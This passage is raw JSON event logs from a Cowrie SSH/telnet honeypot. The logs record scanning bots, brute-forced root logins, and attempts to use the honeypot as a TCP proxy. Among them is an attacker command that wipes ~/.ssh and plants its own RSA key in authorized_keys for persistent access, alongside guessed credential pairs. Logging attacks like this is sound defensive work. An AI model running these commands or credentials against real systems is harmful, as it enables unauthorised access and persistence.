ha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-31T01:43:47.543419Z","src_ip":"212.227.125.160","session":"7fe55b14eb0c"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:43:47.848108Z","src_ip":"212.227.125.160","session":"7fe55b14eb0c"}
{"eventid":"cowrie.session.closed","duration":12.731239080429077,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:43:50.771599Z","src_ip":"212.227.125.160","session":"481091a97f78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43260,"dst_ip":"1.2.3.4","dst_port":23,"session":"973f1843aca1","protocol":"telnet","message":"New connection: 212.227.125.160:43260 (1.2.3.4:23) [session: 973f1843aca1]","sensor":"my-vps","timestamp":"2025-08-31T01:43:50.993455Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"52.49.106.241","dst_port":443,"src_ip":"212.227.125.160","src_port":44732,"message":"direct-tcp connection request to 52.49.106.241:443 from 127.0.0.1:44732","sensor":"my-vps","timestamp":"2025-08-31T01:43:51.667552Z","session":"7fe55b14eb0c"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":33758,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1ef4cc666ec","protocol":"ssh","message":"New connection: 82.67.125.95:33758 (1.2.3.4:22) [session: e1ef4cc666ec]","sensor":"my-vps","timestamp":"2025-08-31T01:43:51.987405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:43:51.988395Z","src_ip":"82.67.125.95","session":"e1ef4cc666ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:43:52.024373Z","src_ip":"82.67.125.95","session":"e1ef4cc666ec"}
{"eventid":"cowrie.login.success","username":"root","password":"admin#123","message":"login attempt [root/admin#123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:43:52.210168Z","src_ip":"82.67.125.95","session":"e1ef4cc666ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:43:52.301523Z","src_ip":"82.67.125.95","session":"e1ef4cc666ec"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:43:52.302220Z","src_ip":"82.67.125.95","session":"e1ef4cc666ec"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:43:52.303444Z","src_ip":"82.67.125.95","session":"e1ef4cc666ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:43:52.341204Z","src_ip":"82.67.125.95","session":"e1ef4cc666ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:43:52.475145Z","src_ip":"82.67.125.95","session":"e1ef4cc666ec"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:43:52.475876Z","src_ip":"82.67.125.95","session":"e1ef4cc666ec"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:43:52.514341Z","src_ip":"82.67.125.95","session":"e1ef4cc666ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:43:52.515237Z","src_ip":"82.67.125.95","session":"e1ef4cc666ec"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":33772,"dst_ip":"1.2.3.4","dst_port":22,"session":"7369f78446e6","protocol":"ssh","message":"New connection: 82.67.125.95:33772 (1.2.3.4:22) [session: 7369f78446e6]","sensor":"my-vps","timestamp":"2025-08-31T01:43:52.549783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:43:52.550607Z","src_ip":"82.67.125.95","session":"7369f78446e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"52.49.106.241","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03Z\\xd4~bXw\\xf4\\xb3d\\xac\\xb1X\\x9b\\xce\\xc3\\x83\\nR\\xc3\\xce\\xe4\\x9c\\x0e\\x94V\\xa5\\xfa\\x9e\\xc8\\xea[\\xcd \\x06qA\\xbe\\xf8&\\x17\\xd6\\x1d\\x04x \\xf8\\x06\\x0c\\xfa\\xbf\\xa3S\\xc36#\\xba\\xd1 \\r\\x8abB\\xd3>\\x1d\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xb2z/bO2/\\xdd\\x92w\\x1e\\xa2u \\x19\\x9c\\xe9\\x95\\xee23`IcIX\\xff\\xe3\\x16\\x95\\x88M\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 52.49.106.241:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03Z\\xd4~bXw\\xf4\\xb3d\\xac\\xb1X\\x9b\\xce\\xc3\\x83\\nR\\xc3\\xce\\xe4\\x9c\\x0e\\x94V\\xa5\\xfa\\x9e\\xc8\\xea[\\xcd \\x06qA\\xbe\\xf8&\\x17\\xd6\\x1d\\x04x \\xf8\\x06\\x0c\\xfa\\xbf\\xa3S\\xc36#\\xba\\xd1 \\r\\x8abB\\xd3>\\x1d\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xb2z/bO2/\\xdd\\x92w\\x1e\\xa2u \\x19\\x9c\\xe9\\x95\\xee23`IcIX\\xff\\xe3\\x16\\x95\\x88M\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T01:43:52.568383Z","src_ip":"212.227.125.160","session":"7fe55b14eb0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:43:52.586390Z","src_ip":"82.67.125.95","session":"7369f78446e6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:43:52.769659Z","src_ip":"82.67.125.95","session":"7369f78446e6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:43:53.808661Z","src_ip":"82.67.125.95","session":"7369f78446e6"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":33788,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c991415f090","protocol":"ssh","message":"New connection: 82.67.125.95:33788 (1.2.3.4:22) [session: 5c991415f090]","sensor":"my-vps","timestamp":"2025-08-31T01:43:53.843579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:43:53.844244Z","src_ip":"82.67.125.95","session":"5c991415f090"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:43:53.880202Z","src_ip":"82.67.125.95","session":"5c991415f090"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:43:54.065627Z","src_ip":"82.67.125.95","session":"5c991415f090"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:43:54.102747Z","src_ip":"82.67.125.95","session":"e1ef4cc666ec"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:43:54.104484Z","src_ip":"82.67.125.95","session":"5c991415f090"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"95.100.221.76","dst_port":443,"src_ip":"212.227.125.160","src_port":47542,"message":"direct-tcp connection request to 95.100.221.76:443 from 127.0.0.1:47542","sensor":"my-vps","timestamp":"2025-08-31T01:43:58.019154Z","session":"7fe55b14eb0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51810,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab35c09f7844","protocol":"ssh","message":"New connection: 212.227.235.229:51810 (1.2.3.4:22) [session: ab35c09f7844]","sensor":"my-vps","timestamp":"2025-08-31T01:43:59.411023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:44:00.496358Z","src_ip":"212.227.235.229","session":"ab35c09f7844"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:44:00.497136Z","src_ip":"212.227.235.229","session":"ab35c09f7844"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"95.100.221.76","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xa1/\\x8e\\x13\\x0e\\xce\\x86\\xd7w\\x13\\t\\x81\\xcdF'\\x1a\\x0b\\x11\\xd89.\\x0c\\xfe\\xe7\\x1b\\x07\\xe9#\\xac}\\x00\\xf8 \\xc8\\x0c\\xd6\\xde+\\xc3J\\x06\\x00E?\\x92\\xd19\\xa5\\xb2\\xfd\\x9dd+\\xe1\\x0ce?\\xd7b\\x95\\xed\\x80\\x89\\xf0\\xc4\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 $au\\x83\\x9e`JW\\x8e\\x1bm\\x80\\xd6\\xbb\\xbe\\x8d\\xb9+\\x87\\xaf\\xa2\\xb8%\\xe5\\xf6\\xd7\\xfa\\xbe\\xe1\\x82]\\x17\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 95.100.221.76:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xa1/\\x8e\\x13\\x0e\\xce\\x86\\xd7w\\x13\\t\\x81\\xcdF'\\x1a\\x0b\\x11\\xd89.\\x0c\\xfe\\xe7\\x1b\\x07\\xe9#\\xac}\\x00\\xf8 